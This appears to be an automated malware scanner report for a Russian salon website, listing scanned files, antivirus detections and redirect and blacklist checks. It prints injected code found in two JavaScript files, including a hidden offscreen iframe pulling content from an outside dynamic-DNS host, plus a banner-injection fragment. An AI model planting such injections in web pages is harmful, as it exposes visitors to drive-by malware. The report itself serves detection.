New scan:

Malware Scanner report for salon-berlin.ru

Malicious/Suspicious/Total urls checked
2/0/13
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://salon-berlin.ru/
200 OK
Content-Length: 11379
Content-Type: text/html
clean
http://salon-berlin.ru/media/system/js/caption.js
200 OK
Content-Length: 2137
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 608 bytes are skipped ...
= container.className + " " + align;
container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});
;document.write('<iframe style="position:fixed;top:0px;left:-500px;" height="120" width="120" src="http://vzklg.ddns.name/dc803917a34c9.weazLLXCDSjS5fft?default"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://salon-berlin.ru/plugins/system/yoo_effects/f44dd41.js
200 OK
Content-Length: 34740
Content-Type: application/x-javascript
clean
http://salon-berlin.ru/templates/full_screen_3/lib/js/iepngfix_tilebg.js
200 OK
Content-Length: 4086
Content-Type: application/x-javascript
clean
http://salon-berlin.ru/templates/full_screen_3/lib/js/jquery-162.js
404 Not Found
Content-Length: 564
Content-Type: text/html
clean
http://salon-berlin.ru/test404page.js
404 Not Found
Content-Length: 564
Content-Type: text/html
clean
http://salon-berlin.ru/templates/full_screen_3/lib/js/jquery.easing.min.js
200 OK
Content-Length: 7046
Content-Type: application/x-javascript
clean
http://salon-berlin.ru/templates/full_screen_3/lib/js/supersized.3.2.1.js
200 OK
Content-Length: 37255
Content-Type: application/x-javascript
clean
http://salon-berlin.ru/templates/full_screen_3/lib/js/theme/supersized.shutter.js
200 OK
Content-Length: 13045
Content-Type: application/x-javascript
clean
http://salon-berlin.ru/templates/full_screen_3/lib/js/moomenuh.js
200 OK
Content-Length: 3813
Content-Type: application/x-javascript
clean
http://salon-berlin.ru/templates/full_screen_3/lib/js/tooltips.js
200 OK
Content-Length: 310
Content-Type: application/x-javascript
clean
http://salon-berlin.ru/css/tetoxi.js
200 OK
Content-Length: 112069
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\
... 3353 bytes are skipped ...
oad = function() {
if (!mdom) {
newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>";
if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); }
}
}

Antivirus reports:

Bkav
W32.HfsIframe.3abf

http://salon-berlin.ru/share42/share42.js
200 OK
Content-Length: 2939
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: salon-berlin.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 19:40:23 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.5.16
Second query (visit from search engine):
GET / HTTP/1.1
Host: salon-berlin.ru
Referer: http://www.google.com/search?q=salon-berlin.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=salon-berlin.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://salon-berlin.ru/

Result: salon-berlin.ru is not infected or malware details are not published yet.